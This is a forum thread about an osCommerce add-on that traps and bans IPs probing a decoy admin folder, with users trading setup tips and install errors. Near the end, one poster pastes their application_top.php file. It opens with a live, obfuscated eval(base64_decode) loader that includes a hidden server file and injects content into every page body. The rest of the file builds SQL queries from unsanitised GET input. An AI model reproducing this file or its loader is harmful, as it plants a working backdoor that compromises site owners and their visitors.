IP trap Version 3 released

[♥Biancoblu]

Thanks for trying Leslie. I have now added your IP to the whitelist, can you try again and see if you get redirected to index.php please?

[Guest]

Thanks for trying Leslie. I have now added your IP to the whitelist, can you try again and see if you get redirected to index.php please?

I got to your site so I am not banned (thank you), then I went to "the" folder and was redirected to the home page. So, for me it worked as expected.

 

PS I tried IE6 and FF.

 

PPS on my site I copied the contents of "the" directory to a new folder called admin.

Edited October 24, 2009 by Coopco

[♥FIMBLE]

@ Les

 

Thats a really, good idea i like it!

 

Nic

 

 

[♥Biancoblu]

Thanks for testing Leslie, and I agree with Nic, what you did with the folder is an excellent idea.

[Mort-lemur]

Hi,

 

Firstly I think this is a great contribution.

 

One question though - can I use this as another layer of security to prevent anyone not on the whitelist from trying to access my admin files?

 

Am I being too simplistic in thinking I just need to add another line to the disallows in the robots file?

 

Thanks

[♥FIMBLE]

Hi, thank you.

 

hmmm interesting question!

In theory no as there is already an index.php page in the admin folder, as this is what it relies upon.

Now you have me intrigued so i will have a look at it

Nic

[madstarr]

I got to your site so I am not banned (thank you), then I went to "the" folder and was redirected to the home page. So, for me it worked as expected.

 

PS I tried IE6 and FF.

 

PPS on my site I copied the contents of "the" directory to a new folder called admin.

 

Can you explain better what you mean copied the contents of "the" directory to a new folder called admin. I understand the theory and i like it, just not sure what i need to do differently.

 

Thank you.

[Guest]

Can you explain better what you mean copied the contents of "the" directory to a new folder called admin. I understand the theory and i like it, just not sure what i need to do differently.

 

Thank you.

I had previously renamed the admin folder to something else like you need to do to help secure your site. At this point, no admin folder.

 

I then copied the contents of the folder that is used by IP trap (I do not want to name it here, if you install the contribution you should be able to work out what it is) to a new folder called admin. So if someone goes fishing for the admin of my site, they will get banned. No honest person would be looking for my admin, so I do not want them on my site.

 

I have some others set up. Their names are other hacking attempt folders as determined by what appears in my 404 error pages.

[Goaul]

Will this addon also be for osCommerce 3.x? or atleast some short manual how to add it to work for that version?

[♥FIMBLE]

Will this addon also be for osCommerce 3.x? or atleast some short manual how to add it to work for that version?

 

Hi

It has not been tested on version 3 as yet, so im not sure

Nic

[rafael-cdkeyhouse]

Hi i have just installed the V4 and i get this error

 

Parse error: syntax error, unexpected $end in /home/*****/public_html/includes/application_top.php on line 523

 

i have this on line 523

 

$products = tep_db_fetch_array($products_query);

[♥FIMBLE]

an unexpected end means usually that a closing curly brace has been omitted. check the code once again for this

Nic

[♥altoid]

I then copied the contents of the folder that is used by IP trap (I do not want to name it here.......

 

Nic - Leslie:

 

I am finally getting around to installing the update.

 

Regarding Leslie's concept, would appropriately modifying the robots.txt file to work with this strategy be a good idea?? ie. the the disallow approach.

 

Thanks

[♥FIMBLE]

Nic - Leslie:

 

I am finally getting around to installing the update.

 

Regarding Leslie's concept, would appropriately modifying the robots.txt file to work with this strategy be a good idea?? ie. the the disallow approach.

 

Thanks

 

Hi

Yes add the admin folder if this is what you will rename the personal folder to, i have an update out to protect the admin folder (or where ever you have you admin folder) i will release it soon, there are a few who have tested this for me already and it works fine, just a simple change to make it work too.

Nic

[♥altoid]

Hi

Yes add the admin folder if this is what you will rename the personal folder to, i have an update out to protect the admin folder (or where ever you have you admin folder) i will release it soon, there are a few who have tested this for me already and it works fine, just a simple change to make it work too.

Nic

 

Thanks...will do and will watch for the update also. Much appreciated.

[sky_diver]

Will this addon also be for osCommerce 3.x? or atleast some short manual how to add it to work for that version?

WHy would you want to flood V3 with incomplete downloads? I think we have all seen enough of that with the current Milestones.

[Lacocinadebabette]

Hi, I have installed the IP trap and I'm not sure is working properly (www.lacocinadebabette.com/tienda). I've added one ip adress to the ip trapped folder and I still see it around. I've added mine and if it is first, it bans me, but if it is second it doesn't. Have I done something wrong? Thanks in advance.

 

All best,

 

Beatriz

[♥FIMBLE]

Hi Did

you add the code to the application_top.php?

Nic

[♥altoid]

Hi

Yes add the admin folder if this is what you will rename the personal folder to, i have an update out to protect the admin folder (or where ever you have you admin folder) i will release it soon, there are a few who have tested this for me already and it works fine, just a simple change to make it work too.

Nic

 

Nic, got a catch today using the trap. I look through my log to see what occurred, it appears the visitor picked my site up in another forum topic dealing with the admin security matter. I put my site link there, probably shouldn't have in hindsight. Since then I enabled a bunch of security measures including the "trap".

 

I am still on the uphill side of learning but in the log I see a lot of action from the blocked IP. It appears he/she looked around a bit, then I see a GET nibble at "admin" folder. It appears the block comes in the next line then.

 

I ran the IP and it didn't come back to a search engine that I am aware of.

 

I am not sure but it looks like he/she went back and tried coming in through that first link again. I don't fully grasp the log data but I think I get the gist of this. So this may have been a hack attempt? Why else interested in Admin?

 

Am I interpreting this correctly?

 

Thanks

[Guest]

Hi Fimble,

 

Excellent contribution, thank you.

 

For me the whitelist was not working because the end of line characters can be different on servers.

 

So I fixed it in personal/index.php to remove the added end of line character "\n" to the ip address of the curious visiter and used rtrim to remove the end of line characters from the array elements from file. Now it worked for me.

[eclyptik]

Hi community,

 

i have a problem with the intallation of ip trap V4.

 

I have this message after intallation. i d'ont understand. please help me i need to block many bad spider and robots on my new site. i use osc2.2 RC2. and i have no catalog folder but directly in root folder.

 

<< Warning: file() [function.file]: Unable to access DOCUMENT_ROOT/../banned/IP_Trapped.txt in /home/eclyptik/www/starboutik/includes/secret.php on line 11

 

Warning: file(DOCUMENT_ROOT/../banned/IP_Trapped.txt) [function.file]: failed to open stream: No such file or directory in /home/eclyptik/www/starboutik/includes/secret.php on line 11

 

Warning: Invalid argument supplied for foreach() in /home/eclyptik/www/starboutik/includes/secret.php on line 13

 

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers >>

 

thank you in advance

 

Loic

[♥FIMBLE]

Hi

Have you set the permissions for the files as per the instrcutions?

[dunn]

Hello Fimble,

 

I am stuck trying to figure out where is line 56 in my application_top.php it scares me everytime i have to install a contribution that my site will be down. But luckily i have developed a fail safe way of downloading the actual php file before making any changes to it. Anyways i was able to fend off early an attack by the /**/eval(base64_decode virus so i have extended lines can you identify which would be the lines proceeding it.

 

<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9yanJkaXNjby9wdWJsaWNfaHRtbC9iYWNrdXAvcGhwZm9ybXMvY25rLWFkbWluL2lkeC9kaXNwbGF5L3NlY3Rpb25zL2FkdmFuY2VkL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9yanJkaXNjby9wdWJsaWNfaHRtbC9iYWNrdXAvcGhwZm9ybXMvY25rLWFkbWluL2lkeC9kaXNwbGF5L3NlY3Rpb25zL2FkdmFuY2VkL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

<?php

 

/*

 

$Id: application_top.php 1833 2008-01-30 22:03:30Z hpdl $

 

 

 

osCommerce, Open Source E-Commerce Solutions

 

http://www.oscommerce.com

 

 

 

Copyright © 2008 osCommerce

 

 

 

Released under the GNU General Public License

 

*/

 

 

 

// start the timer for the page parse time log

 

define('PAGE_PARSE_START_TIME', microtime());

 

 

 

// set the level of error reporting

 

error_reporting(E_ALL & ~E_NOTICE);

 

 

 

// check support for register_globals

 

if (function_exists('ini_get') && (ini_get('register_globals') == false) && (PHP_VERSION < 4.3) ) {

 

exit('Server Requirement Error: register_globals is disabled in your PHP configuration. This can be enabled in your php.ini configuration file or in the .htaccess file in your catalog directory. Please use PHP 4.3+ if register_globals cannot be enabled on the server.');

 

}

 

 

 

// Set the local configuration parameters - mainly for developers

 

if (file_exists('includes/local/configure.php')) include('includes/local/configure.php');

 

 

 

// include server parameters

 

require('includes/configure.php');

 

 

 

if (strlen(DB_SERVER) < 1) {

 

if (is_dir('install')) {

 

header('Location: install/index.php');

 

}

 

}

 

 

 

// define the project version

 

define('PROJECT_VERSION', 'osCommerce Online Merchant v2.2 RC2a');

 

 

 

// some code to solve compatibility issues

 

require(DIR_WS_FUNCTIONS . 'compatibility.php');

 

 

 

// set the type of request (secure or not)

 

$request_type = (getenv('HTTPS') == 'on') ? 'SSL' : 'NONSSL';

 

 

 

// set php_self in the local scope

 

if (!isset($PHP_SELF)) $PHP_SELF = $HTTP_SERVER_VARS['PHP_SELF'];

 

 

 

if ($request_type == 'NONSSL') {

 

define('DIR_WS_CATALOG', DIR_WS_HTTP_CATALOG);

 

} else {

 

define('DIR_WS_CATALOG', DIR_WS_HTTPS_CATALOG);

 

}

 

 

 

// include the list of project filenames

 

require(DIR_WS_INCLUDES . 'filenames.php');

 

 

 

// include the list of project database tables

 

require(DIR_WS_INCLUDES . 'database_tables.php');

 

 

 

// customization for the design layout

 

define('BOX_WIDTH', 125); // how wide the boxes should be in pixels (default: 125)

 

 

 

// include the database functions

 

require(DIR_WS_FUNCTIONS . 'database.php');

 

 

 

// make a connection to the database... now

 

tep_db_connect() or die('Unable to connect to database server!');

 

 

 

// set the application parameters

 

$configuration_query = tep_db_query('select configuration_key as cfgKey, configuration_value as cfgValue from ' . TABLE_CONFIGURATION);

 

while ($configuration = tep_db_fetch_array($configuration_query)) {

 

define($configuration['cfgKey'], $configuration['cfgValue']);

 

}

 

 

 

// if gzip_compression is enabled, start to buffer the output

 

if ( (GZIP_COMPRESSION == 'true') && ($ext_zlib_loaded = extension_loaded('zlib')) && (PHP_VERSION >= '4') ) {

 

if (($ini_zlib_output_compression = (int)ini_get('zlib.output_compression')) < 1) {

 

if (PHP_VERSION >= '4.0.4') {

 

ob_start('ob_gzhandler');

 

} else {

 

include(DIR_WS_FUNCTIONS . 'gzip_compression.php');

 

ob_start();

 

ob_implicit_flush();

 

}

 

} else {

 

ini_set('zlib.output_compression_level', GZIP_LEVEL);

 

}

 

}

 

 

 

// set the HTTP GET parameters manually if search_engine_friendly_urls is enabled

 

if (SEARCH_ENGINE_FRIENDLY_URLS == 'true') {

 

if (strlen(getenv('PATH_INFO')) > 1) {

 

$GET_array = array();

 

$PHP_SELF = str_replace(getenv('PATH_INFO'), '', $PHP_SELF);

 

$vars = explode('/', substr(getenv('PATH_INFO'), 1));

 

for ($i=0, $n=sizeof($vars); $i<$n; $i++) {

 

if (strpos($vars[$i], '[]')) {

 

$GET_array[substr($vars[$i], 0, -2)][] = $vars[$i+1];

 

} else {

 

$HTTP_GET_VARS[$vars[$i]] = $vars[$i+1];

 

}

 

$i++;

 

}

 

 

 

if (sizeof($GET_array) > 0) {

 

while (list($key, $value) = each($GET_array)) {

 

$HTTP_GET_VARS[$key] = $value;

 

}

 

}

 

}

 

}

 

 

 

// define general functions used application-wide

 

require(DIR_WS_FUNCTIONS . 'general.php');

 

require(DIR_WS_FUNCTIONS . 'html_output.php');

 

 

 

// set the cookie domain

 

$cookie_domain = (($request_type == 'NONSSL') ? HTTP_COOKIE_DOMAIN : HTTPS_COOKIE_DOMAIN);

 

$cookie_path = (($request_type == 'NONSSL') ? HTTP_COOKIE_PATH : HTTPS_COOKIE_PATH);

 

 

 

// include cache functions if enabled

 

if (USE_CACHE == 'true') include(DIR_WS_FUNCTIONS . 'cache.php');

 

 

 

// include shopping cart class

 

require(DIR_WS_CLASSES . 'shopping_cart.php');

 

 

 

// include navigation history class

 

require(DIR_WS_CLASSES . 'navigation_history.php');

 

 

 

// check if sessions are supported, otherwise use the php3 compatible session class

 

if (!function_exists('session_start')) {

 

define('PHP_SESSION_NAME', 'osCsid');

 

define('PHP_SESSION_PATH', $cookie_path);

 

define('PHP_SESSION_DOMAIN', $cookie_domain);

 

define('PHP_SESSION_SAVE_PATH', SESSION_WRITE_DIRECTORY);

 

 

 

include(DIR_WS_CLASSES . 'sessions.php');

 

}

 

 

 

// define how the session functions will be used

 

require(DIR_WS_FUNCTIONS . 'sessions.php');

 

 

 

// set the session name and save path

 

tep_session_name('osCsid');

 

tep_session_save_path(SESSION_WRITE_DIRECTORY);

 

 

 

// set the session cookie parameters

 

if (function_exists('session_set_cookie_params')) {

 

session_set_cookie_params(0, $cookie_path, $cookie_domain);

 

} elseif (function_exists('ini_set')) {

 

ini_set('session.cookie_lifetime', '0');

 

ini_set('session.cookie_path', $cookie_path);

 

ini_set('session.cookie_domain', $cookie_domain);

 

}

 

 

 

// set the session ID if it exists

 

if (isset($HTTP_POST_VARS[tep_session_name()])) {

 

tep_session_id($HTTP_POST_VARS[tep_session_name()]);

 

} elseif ( ($request_type == 'SSL') && isset($HTTP_GET_VARS[tep_session_name()]) ) {

 

tep_session_id($HTTP_GET_VARS[tep_session_name()]);

 

}

 

 

 

// start the session

 

$session_started = false;

 

if (SESSION_FORCE_COOKIE_USE == 'True') {

 

tep_setcookie('cookie_test', 'please_accept_for_session', time()+60*60*24*30, $cookie_path, $cookie_domain);

 

 

 

if (isset($HTTP_COOKIE_VARS['cookie_test'])) {

 

tep_session_start();

 

$session_started = true;

 

}

 

} elseif (SESSION_BLOCK_SPIDERS == 'True') {

 

$user_agent = strtolower(getenv('HTTP_USER_AGENT'));

 

$spider_flag = false;

 

 

 

if (tep_not_null($user_agent)) {

 

$spiders = file(DIR_WS_INCLUDES . 'spiders.txt');

 

 

 

for ($i=0, $n=sizeof($spiders); $i<$n; $i++) {

 

if (tep_not_null($spiders[$i])) {

 

if (is_integer(strpos($user_agent, trim($spiders[$i])))) {

 

$spider_flag = true;

 

break;

 

}

 

}

 

}

 

}

 

 

 

if ($spider_flag == false) {

 

tep_session_start();

 

$session_started = true;

 

}

 

} else {

 

tep_session_start();

 

$session_started = true;

 

}

 

 

 

if ( ($session_started == true) && (PHP_VERSION >= 4.3) && function_exists('ini_get') && (ini_get('register_globals') == false) ) {

 

extract($_SESSION, EXTR_OVERWRITE+EXTR_REFS);

 

}

 

 

 

// set SID once, even if empty

 

$SID = (defined('SID') ? SID : '');

 

 

 

// verify the ssl_session_id if the feature is enabled

 

if ( ($request_type == 'SSL') && (SESSION_CHECK_SSL_SESSION_ID == 'True') && (ENABLE_SSL == true) && ($session_started == true) ) {

 

$ssl_session_id = getenv('SSL_SESSION_ID');

 

if (!tep_session_is_registered('SSL_SESSION_ID')) {

 

$SESSION_SSL_ID = $ssl_session_id;

 

tep_session_register('SESSION_SSL_ID');

 

}

 

 

 

if ($SESSION_SSL_ID != $ssl_session_id) {

 

tep_session_destroy();

 

tep_redirect(tep_href_link(FILENAME_SSL_CHECK));

 

}

 

}

 

 

 

// verify the browser user agent if the feature is enabled

 

if (SESSION_CHECK_USER_AGENT == 'True') {

 

$http_user_agent = getenv('HTTP_USER_AGENT');

 

if (!tep_session_is_registered('SESSION_USER_AGENT')) {

 

$SESSION_USER_AGENT = $http_user_agent;

 

tep_session_register('SESSION_USER_AGENT');

 

}

 

 

 

if ($SESSION_USER_AGENT != $http_user_agent) {

 

tep_session_destroy();

 

tep_redirect(tep_href_link(FILENAME_LOGIN));

 

}

 

}

 

 

 

// verify the IP address if the feature is enabled

 

if (SESSION_CHECK_IP_ADDRESS == 'True') {

 

$ip_address = tep_get_ip_address();

 

if (!tep_session_is_registered('SESSION_IP_ADDRESS')) {

 

$SESSION_IP_ADDRESS = $ip_address;

 

tep_session_register('SESSION_IP_ADDRESS');

 

}

 

 

 

if ($SESSION_IP_ADDRESS != $ip_address) {

 

tep_session_destroy();

 

tep_redirect(tep_href_link(FILENAME_LOGIN));

 

}

 

}

// only trust a session ID from the URL if refered

// from this site

if ( isset($HTTP_SERVER_VARS['HTTP_REFERER']) || tep_session_is_registered('first_referred_by') ) {

$referrer = parse_url($HTTP_SERVER_VARS['HTTP_REFERER']);

if ( ( HTTP_COOKIE_DOMAIN != substr('.' . $referrer['host'], -1 * strlen(HTTP_COOKIE_DOMAIN)) )

&& ( HTTPS_COOKIE_DOMAIN != substr('.' . $referrer['host'], -1 * strlen(HTTPS_COOKIE_DOMAIN)) )

&& ( $SID == tep_session_name() . '=' . $HTTP_GET_VARS[tep_session_name()] )

)

{

if ( function_exists('session_regenerate_id') ) {

session_regenerate_id();

$SID = (defined('SID') ? SID : '');

if ( isset($HTTP_GET_VARS[tep_session_name()]) ) unset($HTTP_GET_VARS[tep_session_name()]);

$_SESSION = array();

}

}

 

if ( isset($HTTP_SERVER_VARS['HTTP_REFERER']) && ! tep_session_is_registered('first_referred_by') ) {

tep_session_register('first_referred_by');

$first_referred_by = $HTTP_SERVER_VARS['HTTP_REFERER'];

}

}

 

 

// create the shopping cart & fix the cart if necesary

 

if (tep_session_is_registered('cart') && is_object($cart)) {

 

if (PHP_VERSION < 4) {

 

$broken_cart = $cart;

 

$cart = new shoppingCart;

 

$cart->unserialize($broken_cart);

 

}

 

} else {

 

tep_session_register('cart');

 

$cart = new shoppingCart;

 

}

 

 

 

// include currencies class and create an instance

 

require(DIR_WS_CLASSES . 'currencies.php');

 

$currencies = new currencies();

 

 

 

// include the mail classes

 

require(DIR_WS_CLASSES . 'mime.php');

 

require(DIR_WS_CLASSES . 'email.php');

 

 

 

// set the language

 

if (!tep_session_is_registered('language') || isset($HTTP_GET_VARS['language'])) {

 

if (!tep_session_is_registered('language')) {

 

tep_session_register('language');

 

tep_session_register('languages_id');

 

}

 

 

 

include(DIR_WS_CLASSES . 'language.php');

 

$lng = new language();

 

 

 

if (isset($HTTP_GET_VARS['language']) && tep_not_null($HTTP_GET_VARS['language'])) {

 

$lng->set_language($HTTP_GET_VARS['language']);

 

} else {

 

$lng->get_browser_language();

 

}

 

 

 

$language = $lng->language['directory'];

 

$languages_id = $lng->language['id'];

 

}

 

 

 

// include the language translations

 

require(DIR_WS_LANGUAGES . $language . '.php');

 

// Ultimate SEO URLs v2.1

 

if ((!defined(SEO_ENABLED)) || (SEO_ENABLED == 'true')) {

 

include_once(DIR_WS_CLASSES . 'seo.class.php');

 

if ( !is_object($seo_urls) ){

 

$seo_urls = new SEO_URL($languages_id);

 

}

 

}

 

// currency

 

if (!tep_session_is_registered('currency') || isset($HTTP_GET_VARS['currency']) || ( (USE_DEFAULT_LANGUAGE_CURRENCY == 'true') && (LANGUAGE_CURRENCY != $currency) ) ) {

 

if (!tep_session_is_registered('currency')) tep_session_register('currency');

 

 

 

if (isset($HTTP_GET_VARS['currency']) && $currencies->is_set($HTTP_GET_VARS['currency'])) {

 

$currency = $HTTP_GET_VARS['currency'];

 

} else {

 

$currency = (USE_DEFAULT_LANGUAGE_CURRENCY == 'true') ? LANGUAGE_CURRENCY : DEFAULT_CURRENCY;

 

}

 

}

 

 

 

// navigation history

 

if (tep_session_is_registered('navigation') && is_object($navigation)) {

 

if (PHP_VERSION < 4) {

 

$broken_navigation = $navigation;

 

$navigation = new navigationHistory;

 

$navigation->unserialize($broken_navigation);

 

} else {

 

$navigation = new navigationHistory;

 

}

 

} else {

 

tep_session_register('navigation');

 

$navigation = new navigationHistory;

 

}

 

$navigation->add_current_page();

 

# /*if (tep_session_is_registered('navigation')) {

 

# if (PHP_VERSION < 4) {

 

# $broken_navigation = $navigation;

 

# $navigation = new navigationHistory;

 

# $navigation->unserialize($broken_navigation);

 

# }

 

# } else {

 

# tep_session_register('navigation');

 

# $navigation = new navigationHistory;

 

# }

 

# $navigation->add_current_page();

 

#*/

 

// Shopping cart actions

 

if (isset($HTTP_GET_VARS['action'])) {

 

// redirect the customer to a friendly cookie-must-be-enabled page if cookies are disabled

 

if ($session_started == false) {

 

tep_redirect(tep_href_link(FILENAME_COOKIE_USAGE));

 

}

 

 

 

if (DISPLAY_CART == 'true') {

 

$goto = FILENAME_SHOPPING_CART;

 

$parameters = array('action', 'cPath', 'products_id', 'pid');

 

} else {

 

$goto = basename($PHP_SELF);

 

if ($HTTP_GET_VARS['action'] == 'buy_now') {

 

if (isset($HTTP_GET_VARS['product_to_buy_id'])) {

$parameters = array('action', 'pid', 'product_to_buy_id');

} else {

$parameters = array('action', 'pid', 'products_id');

}

 

} else {

 

$parameters = array('action', 'pid');

 

}

 

}

 

switch ($HTTP_GET_VARS['action']) {

 

// customer wants to update the product quantity in their shopping cart

 

case 'update_product' : for ($i=0, $n=sizeof($HTTP_POST_VARS['products_id']); $i<$n; $i++) {

 

if (in_array($HTTP_POST_VARS['products_id'][$i], (is_array($HTTP_POST_VARS['cart_delete']) ? $HTTP_POST_VARS['cart_delete'] : array()))) {

 

$cart->remove($HTTP_POST_VARS['products_id'][$i]);

 

} else {

 

if (PHP_VERSION < 4) {

 

// if PHP3, make correction for lack of multidimensional array.

 

reset($HTTP_POST_VARS);

 

while (list($key, $value) = each($HTTP_POST_VARS)) {

 

if (is_array($value)) {

 

while (list($key2, $value2) = each($value)) {

 

if (ereg ("(.*)\]\[(.*)", $key2, $var)) {

 

$id2[$var[1]][$var[2]] = $value2;

 

}

 

}

 

}

 

}

 

$attributes = ($id2[$HTTP_POST_VARS['products_id'][$i]]) ? $id2[$HTTP_POST_VARS['products_id'][$i]] : '';

 

} else {

 

$attributes = ($HTTP_POST_VARS['id'][$HTTP_POST_VARS['products_id'][$i]]) ? $HTTP_POST_VARS['id'][$HTTP_POST_VARS['products_id'][$i]] : '';

 

}

 

$cart->add_cart($HTTP_POST_VARS['products_id'][$i], $HTTP_POST_VARS['cart_quantity'][$i], $attributes, false);

 

}

 

}

 

// {{ buySAFE Module

 

$WantsBond = ($HTTP_POST_VARS['WantsBond'] ? $HTTP_POST_VARS['WantsBond'] : $HTTP_SESSION_VARS['WantsBond']);

 

// }}

 

tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));

 

break;

 

// customer adds a product from the products page

 

case 'add_product' :

//.........Technokraft Start ShopCart code......//

if (isset($HTTP_POST_VARS['products_id']) && is_numeric($HTTP_POST_VARS['products_id'])) {

$cart->add_cart($HTTP_POST_VARS['products_id'], $cart->get_quantity(tep_get_uprid($HTTP_POST_VARS['products_id'], $HTTP_POST_VARS['id']))+1, $HTTP_POST_VARS['id']);

}

//.........End Technokraft ShopCart code......//

tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));

break;

// performed by the 'buy now' button in product listings and review page

 

case 'buy_now' :

if (isset($HTTP_GET_VARS['product_to_buy_id'])) {

if (tep_has_product_attributes($HTTP_GET_VARS['product_to_buy_id'])) {

tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['product_to_buy_id']));

} else {

$cart->add_cart($HTTP_GET_VARS['product_to_buy_id'], $cart->get_quantity($HTTP_GET_VARS['product_to_buy_id'])+1);

}

} elseif (isset($HTTP_GET_VARS['products_id'])) {

if (tep_has_product_attributes($HTTP_GET_VARS['products_id'])) {

tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['products_id']));

 

} else {

 

$cart->add_cart($HTTP_GET_VARS['products_id'], $cart->get_quantity($HTTP_GET_VARS['products_id'])+1);

 

}

 

}

//.........Start Technokraft ShopCart code......//

tep_redirect(html_entity_decode(tep_href_link($goto, tep_get_all_get_params($parameters))));

//.........End Technokraft ShopCart code......//

break;

 

case 'notify' : if (tep_session_is_registered('customer_id')) {

 

if (isset($HTTP_GET_VARS['products_id'])) {

 

$notify = $HTTP_GET_VARS['products_id'];

 

} elseif (isset($HTTP_GET_VARS['notify'])) {

 

$notify = $HTTP_GET_VARS['notify'];

 

} elseif (isset($HTTP_POST_VARS['notify'])) {

 

$notify = $HTTP_POST_VARS['notify'];

 

} else {

 

tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action', 'notify'))));

 

}

 

if (!is_array($notify)) $notify = array($notify);

 

for ($i=0, $n=sizeof($notify); $i<$n; $i++) {

 

$check_query = tep_db_query("select count(*) as count from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $notify[$i] . "' and customers_id = '" . $customer_id . "'");

 

$check = tep_db_fetch_array($check_query);

 

if ($check['count'] < 1) {

 

tep_db_query("insert into " . TABLE_PRODUCTS_NOTIFICATIONS . " (products_id, customers_id, date_added) values ('" . $notify[$i] . "', '" . $customer_id . "', now())");

 

}

 

}

 

tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action', 'notify'))));

 

} else {

 

$navigation->set_snapshot();

 

tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL'));

 

}

 

break;

 

case 'notify_remove' : if (tep_session_is_registered('customer_id') && isset($HTTP_GET_VARS['products_id'])) {

 

$check_query = tep_db_query("select count(*) as count from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $HTTP_GET_VARS['products_id'] . "' and customers_id = '" . $customer_id . "'");

 

$check = tep_db_fetch_array($check_query);

 

if ($check['count'] > 0) {

 

tep_db_query("delete from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $HTTP_GET_VARS['products_id'] . "' and customers_id = '" . $customer_id . "'");

 

}

 

tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action'))));

 

} else {

 

$navigation->set_snapshot();

 

tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL'));

 

}

 

break;

 

case 'cust_order' : if (tep_session_is_registered('customer_id') && isset($HTTP_GET_VARS['pid'])) {

 

if (tep_has_product_attributes($HTTP_GET_VARS['pid'])) {

 

tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['pid']));

 

} else {

 

$cart->add_cart($HTTP_GET_VARS['pid'], $cart->get_quantity($HTTP_GET_VARS['pid'])+1);

 

}

 

}

 

tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));

